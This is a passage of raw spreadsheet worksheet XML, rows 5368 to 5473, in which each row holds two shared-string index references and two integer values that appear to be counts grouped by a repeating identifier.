        <v>16213</v>
      </c>
      <c r="C5368">
        <v>0</v>
      </c>
      <c r="D5368">
        <v>2750</v>
      </c>
    </row>
    <row r="5369" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5369" t="s">
        <v>16231</v>
      </c>
      <c r="B5369" t="s">
        <v>16214</v>
      </c>
      <c r="C5369">
        <v>0</v>
      </c>
      <c r="D5369">
        <v>2750</v>
      </c>
    </row>
    <row r="5370" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5370" t="s">
        <v>16228</v>
      </c>
      <c r="B5370" t="s">
        <v>16215</v>
      </c>
      <c r="C5370">
        <v>0</v>
      </c>
      <c r="D5370">
        <v>2750</v>
      </c>
    </row>
    <row r="5371" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5371" t="s">
        <v>16231</v>
      </c>
      <c r="B5371" t="s">
        <v>16216</v>
      </c>
      <c r="C5371">
        <v>1</v>
      </c>
      <c r="D5371">
        <v>2750</v>
      </c>
    </row>
    <row r="5372" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5372" t="s">
        <v>16228</v>
      </c>
      <c r="B5372" t="s">
        <v>16217</v>
      </c>
      <c r="C5372">
        <v>3</v>
      </c>
      <c r="D5372">
        <v>2750</v>
      </c>
    </row>
    <row r="5373" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5373" t="s">
        <v>16231</v>
      </c>
      <c r="B5373" t="s">
        <v>16218</v>
      </c>
      <c r="C5373">
        <v>4</v>
      </c>
      <c r="D5373">
        <v>2750</v>
      </c>
    </row>
    <row r="5374" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5374" t="s">
        <v>16229</v>
      </c>
      <c r="B5374" t="s">
        <v>16219</v>
      </c>
      <c r="C5374">
        <v>0</v>
      </c>
      <c r="D5374">
        <v>2750</v>
      </c>
    </row>
    <row r="5375" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5375" t="s">
        <v>16230</v>
      </c>
      <c r="B5375" t="s">
        <v>16220</v>
      </c>
      <c r="C5375">
        <v>0</v>
      </c>
      <c r="D5375">
        <v>2750</v>
      </c>
    </row>
    <row r="5376" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5376" t="s">
        <v>16229</v>
      </c>
      <c r="B5376" t="s">
        <v>16221</v>
      </c>
      <c r="C5376">
        <v>0</v>
      </c>
      <c r="D5376">
        <v>2750</v>
      </c>
    </row>
    <row r="5377" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5377" t="s">
        <v>16230</v>
      </c>
      <c r="B5377" t="s">
        <v>16222</v>
      </c>
      <c r="C5377">
        <v>0</v>
      </c>
      <c r="D5377">
        <v>2750</v>
      </c>
    </row>
    <row r="5378" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5378" t="s">
        <v>16223</v>
      </c>
      <c r="B5378" t="s">
        <v>16223</v>
      </c>
      <c r="C5378">
        <v>8</v>
      </c>
      <c r="D5378">
        <v>2750</v>
      </c>
    </row>
    <row r="5379" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5379" t="s">
        <v>16224</v>
      </c>
      <c r="B5379" t="s">
        <v>16224</v>
      </c>
      <c r="C5379">
        <v>1</v>
      </c>
      <c r="D5379">
        <v>2750</v>
      </c>
    </row>
    <row r="5380" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5380" t="s">
        <v>16228</v>
      </c>
      <c r="B5380" t="s">
        <v>16211</v>
      </c>
      <c r="C5380">
        <v>0</v>
      </c>
      <c r="D5380">
        <v>625</v>
      </c>
    </row>
    <row r="5381" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5381" t="s">
        <v>16231</v>
      </c>
      <c r="B5381" t="s">
        <v>16212</v>
      </c>
      <c r="C5381">
        <v>0</v>
      </c>
      <c r="D5381">
        <v>625</v>
      </c>
    </row>
    <row r="5382" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5382" t="s">
        <v>16228</v>
      </c>
      <c r="B5382" t="s">
        <v>16213</v>
      </c>
      <c r="C5382">
        <v>1</v>
      </c>
      <c r="D5382">
        <v>625</v>
      </c>
    </row>
    <row r="5383" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5383" t="s">
        <v>16231</v>
      </c>
      <c r="B5383" t="s">
        <v>16214</v>
      </c>
      <c r="C5383">
        <v>0</v>
      </c>
      <c r="D5383">
        <v>625</v>
      </c>
    </row>
    <row r="5384" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5384" t="s">
        <v>16228</v>
      </c>
      <c r="B5384" t="s">
        <v>16215</v>
      </c>
      <c r="C5384">
        <v>9</v>
      </c>
      <c r="D5384">
        <v>625</v>
      </c>
    </row>
    <row r="5385" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5385" t="s">
        <v>16231</v>
      </c>
      <c r="B5385" t="s">
        <v>16216</v>
      </c>
      <c r="C5385">
        <v>10</v>
      </c>
      <c r="D5385">
        <v>625</v>
      </c>
    </row>
    <row r="5386" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5386" t="s">
        <v>16228</v>
      </c>
      <c r="B5386" t="s">
        <v>16217</v>
      </c>
      <c r="C5386">
        <v>65</v>
      </c>
      <c r="D5386">
        <v>625</v>
      </c>
    </row>
    <row r="5387" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5387" t="s">
        <v>16231</v>
      </c>
      <c r="B5387" t="s">
        <v>16218</v>
      </c>
      <c r="C5387">
        <v>16</v>
      </c>
      <c r="D5387">
        <v>625</v>
      </c>
    </row>
    <row r="5388" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5388" t="s">
        <v>16229</v>
      </c>
      <c r="B5388" t="s">
        <v>16219</v>
      </c>
      <c r="C5388">
        <v>9</v>
      </c>
      <c r="D5388">
        <v>625</v>
      </c>
    </row>
    <row r="5389" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5389" t="s">
        <v>16230</v>
      </c>
      <c r="B5389" t="s">
        <v>16220</v>
      </c>
      <c r="C5389">
        <v>13</v>
      </c>
      <c r="D5389">
        <v>625</v>
      </c>
    </row>
    <row r="5390" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5390" t="s">
        <v>16229</v>
      </c>
      <c r="B5390" t="s">
        <v>16221</v>
      </c>
      <c r="C5390">
        <v>183</v>
      </c>
      <c r="D5390">
        <v>625</v>
      </c>
    </row>
    <row r="5391" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5391" t="s">
        <v>16230</v>
      </c>
      <c r="B5391" t="s">
        <v>16222</v>
      </c>
      <c r="C5391">
        <v>322</v>
      </c>
      <c r="D5391">
        <v>625</v>
      </c>
    </row>
    <row r="5392" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5392" t="s">
        <v>16223</v>
      </c>
      <c r="B5392" t="s">
        <v>16223</v>
      </c>
      <c r="C5392">
        <v>25</v>
      </c>
      <c r="D5392">
        <v>625</v>
      </c>
    </row>
    <row r="5393" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5393" t="s">
        <v>16224</v>
      </c>
      <c r="B5393" t="s">
        <v>16224</v>
      </c>
      <c r="C5393">
        <v>3</v>
      </c>
      <c r="D5393">
        <v>625</v>
      </c>
    </row>
    <row r="5394" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5394" t="s">
        <v>16228</v>
      </c>
      <c r="B5394" t="s">
        <v>16211</v>
      </c>
      <c r="C5394">
        <v>0</v>
      </c>
      <c r="D5394">
        <v>374</v>
      </c>
    </row>
    <row r="5395" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5395" t="s">
        <v>16231</v>
      </c>
      <c r="B5395" t="s">
        <v>16212</v>
      </c>
      <c r="C5395">
        <v>0</v>
      </c>
      <c r="D5395">
        <v>374</v>
      </c>
    </row>
    <row r="5396" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5396" t="s">
        <v>16228</v>
      </c>
      <c r="B5396" t="s">
        <v>16213</v>
      </c>
      <c r="C5396">
        <v>0</v>
      </c>
      <c r="D5396">
        <v>374</v>
      </c>
    </row>
    <row r="5397" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5397" t="s">
        <v>16231</v>
      </c>
      <c r="B5397" t="s">
        <v>16214</v>
      </c>
      <c r="C5397">
        <v>0</v>
      </c>
      <c r="D5397">
        <v>374</v>
      </c>
    </row>
    <row r="5398" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5398" t="s">
        <v>16228</v>
      </c>
      <c r="B5398" t="s">
        <v>16215</v>
      </c>
      <c r="C5398">
        <v>3</v>
      </c>
      <c r="D5398">
        <v>374</v>
      </c>
    </row>
    <row r="5399" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5399" t="s">
        <v>16231</v>
      </c>
      <c r="B5399" t="s">
        <v>16216</v>
      </c>
      <c r="C5399">
        <v>1</v>
      </c>
      <c r="D5399">
        <v>374</v>
      </c>
    </row>
    <row r="5400" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5400" t="s">
        <v>16228</v>
      </c>
      <c r="B5400" t="s">
        <v>16217</v>
      </c>
      <c r="C5400">
        <v>13</v>
      </c>
      <c r="D5400">
        <v>374</v>
      </c>
    </row>
    <row r="5401" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5401" t="s">
        <v>16231</v>
      </c>
      <c r="B5401" t="s">
        <v>16218</v>
      </c>
      <c r="C5401">
        <v>1</v>
      </c>
      <c r="D5401">
        <v>374</v>
      </c>
    </row>
    <row r="5402" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5402" t="s">
        <v>16229</v>
      </c>
      <c r="B5402" t="s">
        <v>16219</v>
      </c>
      <c r="C5402">
        <v>3</v>
      </c>
      <c r="D5402">
        <v>374</v>
      </c>
    </row>
    <row r="5403" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5403" t="s">
        <v>16230</v>
      </c>
      <c r="B5403" t="s">
        <v>16220</v>
      </c>
      <c r="C5403">
        <v>10</v>
      </c>
      <c r="D5403">
        <v>374</v>
      </c>
    </row>
    <row r="5404" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5404" t="s">
        <v>16229</v>
      </c>
      <c r="B5404" t="s">
        <v>16221</v>
      </c>
      <c r="C5404">
        <v>29</v>
      </c>
      <c r="D5404">
        <v>374</v>
      </c>
    </row>
    <row r="5405" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5405" t="s">
        <v>16230</v>
      </c>
      <c r="B5405" t="s">
        <v>16222</v>
      </c>
      <c r="C5405">
        <v>139</v>
      </c>
      <c r="D5405">
        <v>374</v>
      </c>
    </row>
    <row r="5406" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5406" t="s">
        <v>16223</v>
      </c>
      <c r="B5406" t="s">
        <v>16223</v>
      </c>
      <c r="C5406">
        <v>25</v>
      </c>
      <c r="D5406">
        <v>374</v>
      </c>
    </row>
    <row r="5407" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5407" t="s">
        <v>16224</v>
      </c>
      <c r="B5407" t="s">
        <v>16224</v>
      </c>
      <c r="C5407">
        <v>1</v>
      </c>
      <c r="D5407">
        <v>374</v>
      </c>
    </row>
    <row r="5408" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5408" t="s">
        <v>16228</v>
      </c>
      <c r="B5408" t="s">
        <v>16211</v>
      </c>
      <c r="C5408">
        <v>0</v>
      </c>
      <c r="D5408">
        <v>2759</v>
      </c>
    </row>
    <row r="5409" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5409" t="s">
        <v>16231</v>
      </c>
      <c r="B5409" t="s">
        <v>16212</v>
      </c>
      <c r="C5409">
        <v>0</v>
      </c>
      <c r="D5409">
        <v>2759</v>
      </c>
    </row>
    <row r="5410" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5410" t="s">
        <v>16228</v>
      </c>
      <c r="B5410" t="s">
        <v>16213</v>
      </c>
      <c r="C5410">
        <v>0</v>
      </c>
      <c r="D5410">
        <v>2759</v>
      </c>
    </row>
    <row r="5411" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5411" t="s">
        <v>16231</v>
      </c>
      <c r="B5411" t="s">
        <v>16214</v>
      </c>
      <c r="C5411">
        <v>0</v>
      </c>
      <c r="D5411">
        <v>2759</v>
      </c>
    </row>
    <row r="5412" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5412" t="s">
        <v>16228</v>
      </c>
      <c r="B5412" t="s">
        <v>16215</v>
      </c>
      <c r="C5412">
        <v>3</v>
      </c>
      <c r="D5412">
        <v>2759</v>
      </c>
    </row>
    <row r="5413" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5413" t="s">
        <v>16231</v>
      </c>
      <c r="B5413" t="s">
        <v>16216</v>
      </c>
      <c r="C5413">
        <v>11</v>
      </c>
      <c r="D5413">
        <v>2759</v>
      </c>
    </row>
    <row r="5414" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5414" t="s">
        <v>16228</v>
      </c>
      <c r="B5414" t="s">
        <v>16217</v>
      </c>
      <c r="C5414">
        <v>10</v>
      </c>
      <c r="D5414">
        <v>2759</v>
      </c>
    </row>
    <row r="5415" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5415" t="s">
        <v>16231</v>
      </c>
      <c r="B5415" t="s">
        <v>16218</v>
      </c>
      <c r="C5415">
        <v>9</v>
      </c>
      <c r="D5415">
        <v>2759</v>
      </c>
    </row>
    <row r="5416" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5416" t="s">
        <v>16229</v>
      </c>
      <c r="B5416" t="s">
        <v>16219</v>
      </c>
      <c r="C5416">
        <v>0</v>
      </c>
      <c r="D5416">
        <v>2759</v>
      </c>
    </row>
    <row r="5417" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5417" t="s">
        <v>16230</v>
      </c>
      <c r="B5417" t="s">
        <v>16220</v>
      </c>
      <c r="C5417">
        <v>8</v>
      </c>
      <c r="D5417">
        <v>2759</v>
      </c>
    </row>
    <row r="5418" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5418" t="s">
        <v>16229</v>
      </c>
      <c r="B5418" t="s">
        <v>16221</v>
      </c>
      <c r="C5418">
        <v>56</v>
      </c>
      <c r="D5418">
        <v>2759</v>
      </c>
    </row>
    <row r="5419" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5419" t="s">
        <v>16230</v>
      </c>
      <c r="B5419" t="s">
        <v>16222</v>
      </c>
      <c r="C5419">
        <v>67</v>
      </c>
      <c r="D5419">
        <v>2759</v>
      </c>
    </row>
    <row r="5420" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5420" t="s">
        <v>16223</v>
      </c>
      <c r="B5420" t="s">
        <v>16223</v>
      </c>
      <c r="C5420">
        <v>25</v>
      </c>
      <c r="D5420">
        <v>2759</v>
      </c>
    </row>
    <row r="5421" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5421" t="s">
        <v>16224</v>
      </c>
      <c r="B5421" t="s">
        <v>16224</v>
      </c>
      <c r="C5421">
        <v>1</v>
      </c>
      <c r="D5421">
        <v>2759</v>
      </c>
    </row>
    <row r="5422" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5422" t="s">
        <v>16228</v>
      </c>
      <c r="B5422" t="s">
        <v>16211</v>
      </c>
      <c r="C5422">
        <v>0</v>
      </c>
      <c r="D5422">
        <v>463</v>
      </c>
    </row>
    <row r="5423" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5423" t="s">
        <v>16231</v>
      </c>
      <c r="B5423" t="s">
        <v>16212</v>
      </c>
      <c r="C5423">
        <v>0</v>
      </c>
      <c r="D5423">
        <v>463</v>
      </c>
    </row>
    <row r="5424" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5424" t="s">
        <v>16228</v>
      </c>
      <c r="B5424" t="s">
        <v>16213</v>
      </c>
      <c r="C5424">
        <v>0</v>
      </c>
      <c r="D5424">
        <v>463</v>
      </c>
    </row>
    <row r="5425" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5425" t="s">
        <v>16231</v>
      </c>
      <c r="B5425" t="s">
        <v>16214</v>
      </c>
      <c r="C5425">
        <v>0</v>
      </c>
      <c r="D5425">
        <v>463</v>
      </c>
    </row>
    <row r="5426" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5426" t="s">
        <v>16228</v>
      </c>
      <c r="B5426" t="s">
        <v>16215</v>
      </c>
      <c r="C5426">
        <v>1</v>
      </c>
      <c r="D5426">
        <v>463</v>
      </c>
    </row>
    <row r="5427" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5427" t="s">
        <v>16231</v>
      </c>
      <c r="B5427" t="s">
        <v>16216</v>
      </c>
      <c r="C5427">
        <v>8</v>
      </c>
      <c r="D5427">
        <v>463</v>
      </c>
    </row>
    <row r="5428" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5428" t="s">
        <v>16228</v>
      </c>
      <c r="B5428" t="s">
        <v>16217</v>
      </c>
      <c r="C5428">
        <v>10</v>
      </c>
      <c r="D5428">
        <v>463</v>
      </c>
    </row>
    <row r="5429" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5429" t="s">
        <v>16231</v>
      </c>
      <c r="B5429" t="s">
        <v>16218</v>
      </c>
      <c r="C5429">
        <v>9</v>
      </c>
      <c r="D5429">
        <v>463</v>
      </c>
    </row>
    <row r="5430" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5430" t="s">
        <v>16229</v>
      </c>
      <c r="B5430" t="s">
        <v>16219</v>
      </c>
      <c r="C5430">
        <v>0</v>
      </c>
      <c r="D5430">
        <v>463</v>
      </c>
    </row>
    <row r="5431" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5431" t="s">
        <v>16230</v>
      </c>
      <c r="B5431" t="s">
        <v>16220</v>
      </c>
      <c r="C5431">
        <v>1</v>
      </c>
      <c r="D5431">
        <v>463</v>
      </c>
    </row>
    <row r="5432" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5432" t="s">
        <v>16229</v>
      </c>
      <c r="B5432" t="s">
        <v>16221</v>
      </c>
      <c r="C5432">
        <v>69</v>
      </c>
      <c r="D5432">
        <v>463</v>
      </c>
    </row>
    <row r="5433" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5433" t="s">
        <v>16230</v>
      </c>
      <c r="B5433" t="s">
        <v>16222</v>
      </c>
      <c r="C5433">
        <v>402</v>
      </c>
      <c r="D5433">
        <v>463</v>
      </c>
    </row>
    <row r="5434" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5434" t="s">
        <v>16223</v>
      </c>
      <c r="B5434" t="s">
        <v>16223</v>
      </c>
      <c r="C5434">
        <v>26</v>
      </c>
      <c r="D5434">
        <v>463</v>
      </c>
    </row>
    <row r="5435" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5435" t="s">
        <v>16224</v>
      </c>
      <c r="B5435" t="s">
        <v>16224</v>
      </c>
      <c r="C5435">
        <v>1</v>
      </c>
      <c r="D5435">
        <v>463</v>
      </c>
    </row>
    <row r="5436" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5436" t="s">
        <v>16228</v>
      </c>
      <c r="B5436" t="s">
        <v>16211</v>
      </c>
      <c r="C5436">
        <v>0</v>
      </c>
      <c r="D5436">
        <v>2275</v>
      </c>
    </row>
    <row r="5437" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5437" t="s">
        <v>16231</v>
      </c>
      <c r="B5437" t="s">
        <v>16212</v>
      </c>
      <c r="C5437">
        <v>0</v>
      </c>
      <c r="D5437">
        <v>2275</v>
      </c>
    </row>
    <row r="5438" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5438" t="s">
        <v>16228</v>
      </c>
      <c r="B5438" t="s">
        <v>16213</v>
      </c>
      <c r="C5438">
        <v>0</v>
      </c>
      <c r="D5438">
        <v>2275</v>
      </c>
    </row>
    <row r="5439" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5439" t="s">
        <v>16231</v>
      </c>
      <c r="B5439" t="s">
        <v>16214</v>
      </c>
      <c r="C5439">
        <v>0</v>
      </c>
      <c r="D5439">
        <v>2275</v>
      </c>
    </row>
    <row r="5440" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5440" t="s">
        <v>16228</v>
      </c>
      <c r="B5440" t="s">
        <v>16215</v>
      </c>
      <c r="C5440">
        <v>2</v>
      </c>
      <c r="D5440">
        <v>2275</v>
      </c>
    </row>
    <row r="5441" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5441" t="s">
        <v>16231</v>
      </c>
      <c r="B5441" t="s">
        <v>16216</v>
      </c>
      <c r="C5441">
        <v>1</v>
      </c>
      <c r="D5441">
        <v>2275</v>
      </c>
    </row>
    <row r="5442" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5442" t="s">
        <v>16228</v>
      </c>
      <c r="B5442" t="s">
        <v>16217</v>
      </c>
      <c r="C5442">
        <v>18</v>
      </c>
      <c r="D5442">
        <v>2275</v>
      </c>
    </row>
    <row r="5443" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5443" t="s">
        <v>16231</v>
      </c>
      <c r="B5443" t="s">
        <v>16218</v>
      </c>
      <c r="C5443">
        <v>0</v>
      </c>
      <c r="D5443">
        <v>2275</v>
      </c>
    </row>
    <row r="5444" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5444" t="s">
        <v>16229</v>
      </c>
      <c r="B5444" t="s">
        <v>16219</v>
      </c>
      <c r="C5444">
        <v>0</v>
      </c>
      <c r="D5444">
        <v>2275</v>
      </c>
    </row>
    <row r="5445" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5445" t="s">
        <v>16230</v>
      </c>
      <c r="B5445" t="s">
        <v>16220</v>
      </c>
      <c r="C5445">
        <v>0</v>
      </c>
      <c r="D5445">
        <v>2275</v>
      </c>
    </row>
    <row r="5446" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5446" t="s">
        <v>16229</v>
      </c>
      <c r="B5446" t="s">
        <v>16221</v>
      </c>
      <c r="C5446">
        <v>0</v>
      </c>
      <c r="D5446">
        <v>2275</v>
      </c>
    </row>
    <row r="5447" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5447" t="s">
        <v>16230</v>
      </c>
      <c r="B5447" t="s">
        <v>16222</v>
      </c>
      <c r="C5447">
        <v>0</v>
      </c>
      <c r="D5447">
        <v>2275</v>
      </c>
    </row>
    <row r="5448" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5448" t="s">
        <v>16223</v>
      </c>
      <c r="B5448" t="s">
        <v>16223</v>
      </c>
      <c r="C5448">
        <v>30</v>
      </c>
      <c r="D5448">
        <v>2275</v>
      </c>
    </row>
    <row r="5449" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5449" t="s">
        <v>16224</v>
      </c>
      <c r="B5449" t="s">
        <v>16224</v>
      </c>
      <c r="C5449">
        <v>1</v>
      </c>
      <c r="D5449">
        <v>2275</v>
      </c>
    </row>
    <row r="5450" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5450" t="s">
        <v>16228</v>
      </c>
      <c r="B5450" t="s">
        <v>16211</v>
      </c>
      <c r="C5450">
        <v>0</v>
      </c>
      <c r="D5450">
        <v>2760</v>
      </c>
    </row>
    <row r="5451" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5451" t="s">
        <v>16231</v>
      </c>
      <c r="B5451" t="s">
        <v>16212</v>
      </c>
      <c r="C5451">
        <v>0</v>
      </c>
      <c r="D5451">
        <v>2760</v>
      </c>
    </row>
    <row r="5452" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5452" t="s">
        <v>16228</v>
      </c>
      <c r="B5452" t="s">
        <v>16213</v>
      </c>
      <c r="C5452">
        <v>0</v>
      </c>
      <c r="D5452">
        <v>2760</v>
      </c>
    </row>
    <row r="5453" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5453" t="s">
        <v>16231</v>
      </c>
      <c r="B5453" t="s">
        <v>16214</v>
      </c>
      <c r="C5453">
        <v>0</v>
      </c>
      <c r="D5453">
        <v>2760</v>
      </c>
    </row>
    <row r="5454" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5454" t="s">
        <v>16228</v>
      </c>
      <c r="B5454" t="s">
        <v>16215</v>
      </c>
      <c r="C5454">
        <v>2</v>
      </c>
      <c r="D5454">
        <v>2760</v>
      </c>
    </row>
    <row r="5455" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5455" t="s">
        <v>16231</v>
      </c>
      <c r="B5455" t="s">
        <v>16216</v>
      </c>
      <c r="C5455">
        <v>1</v>
      </c>
      <c r="D5455">
        <v>2760</v>
      </c>
    </row>
    <row r="5456" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5456" t="s">
        <v>16228</v>
      </c>
      <c r="B5456" t="s">
        <v>16217</v>
      </c>
      <c r="C5456">
        <v>0</v>
      </c>
      <c r="D5456">
        <v>2760</v>
      </c>
    </row>
    <row r="5457" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5457" t="s">
        <v>16231</v>
      </c>
      <c r="B5457" t="s">
        <v>16218</v>
      </c>
      <c r="C5457">
        <v>2</v>
      </c>
      <c r="D5457">
        <v>2760</v>
      </c>
    </row>
    <row r="5458" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5458" t="s">
        <v>16229</v>
      </c>
      <c r="B5458" t="s">
        <v>16219</v>
      </c>
      <c r="C5458">
        <v>0</v>
      </c>
      <c r="D5458">
        <v>2760</v>
      </c>
    </row>
    <row r="5459" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5459" t="s">
        <v>16230</v>
      </c>
      <c r="B5459" t="s">
        <v>16220</v>
      </c>
      <c r="C5459">
        <v>0</v>
      </c>
      <c r="D5459">
        <v>2760</v>
      </c>
    </row>
    <row r="5460" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5460" t="s">
        <v>16229</v>
      </c>
      <c r="B5460" t="s">
        <v>16221</v>
      </c>
      <c r="C5460">
        <v>2</v>
      </c>
      <c r="D5460">
        <v>2760</v>
      </c>
    </row>
    <row r="5461" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5461" t="s">
        <v>16230</v>
      </c>
      <c r="B5461" t="s">
        <v>16222</v>
      </c>
      <c r="C5461">
        <v>4</v>
      </c>
      <c r="D5461">
        <v>2760</v>
      </c>
    </row>
    <row r="5462" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5462" t="s">
        <v>16223</v>
      </c>
      <c r="B5462" t="s">
        <v>16223</v>
      </c>
      <c r="C5462">
        <v>25</v>
      </c>
      <c r="D5462">
        <v>2760</v>
      </c>
    </row>
    <row r="5463" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5463" t="s">
        <v>16224</v>
      </c>
      <c r="B5463" t="s">
        <v>16224</v>
      </c>
      <c r="C5463">
        <v>1</v>
      </c>
      <c r="D5463">
        <v>2760</v>
      </c>
    </row>
    <row r="5464" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5464" t="s">
        <v>16228</v>
      </c>
      <c r="B5464" t="s">
        <v>16211</v>
      </c>
      <c r="C5464">
        <v>0</v>
      </c>
      <c r="D5464">
        <v>2250</v>
      </c>
    </row>
    <row r="5465" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5465" t="s">
        <v>16231</v>
      </c>
      <c r="B5465" t="s">
        <v>16212</v>
      </c>
      <c r="C5465">
        <v>0</v>
      </c>
      <c r="D5465">
        <v>2250</v>
      </c>
    </row>
    <row r="5466" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5466" t="s">
        <v>16228</v>
      </c>
      <c r="B5466" t="s">
        <v>16213</v>
      </c>
      <c r="C5466">
        <v>0</v>
      </c>
      <c r="D5466">
        <v>2250</v>
      </c>
    </row>
    <row r="5467" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5467" t="s">
        <v>16231</v>
      </c>
      <c r="B5467" t="s">
        <v>16214</v>
      </c>
      <c r="C5467">
        <v>0</v>
      </c>
      <c r="D5467">
        <v>2250</v>
      </c>
    </row>
    <row r="5468" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5468" t="s">
        <v>16228</v>
      </c>
      <c r="B5468" t="s">
        <v>16215</v>
      </c>
      <c r="C5468">
        <v>1</v>
      </c>
      <c r="D5468">
        <v>2250</v>
      </c>
    </row>
    <row r="5469" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5469" t="s">
        <v>16231</v>
      </c>
      <c r="B5469" t="s">
        <v>16216</v>
      </c>
      <c r="C5469">
        <v>4</v>
      </c>
      <c r="D5469">
        <v>2250</v>
      </c>
    </row>
    <row r="5470" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5470" t="s">
        <v>16228</v>
      </c>
      <c r="B5470" t="s">
        <v>16217</v>
      </c>
      <c r="C5470">
        <v>1</v>
      </c>
      <c r="D5470">
        <v>2250</v>
      </c>
    </row>
    <row r="5471" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5471" t="s">
        <v>16231</v>
      </c>
      <c r="B5471" t="s">
        <v>16218</v>
      </c>
      <c r="C5471">
        <v>4</v>
      </c>
      <c r="D5471">
        <v>2250</v>
      </c>
    </row>
    <row r="5472" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5472" t="s">
        <v>16229</v>
      </c>
      <c r="B5472" t="s">
        <v>16219</v>
      </c>
      <c r="C5472">
        <v>0</v>
      </c>
      <c r="D5472">
        <v>2250</v>
      </c>
    </row>
    <row r="5473" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5473" t="s">
        <v>16230</v>
      </c>
      <c r="B5473" t="s">
        <v>16220</v>
      </c>
      <c r="C5473">
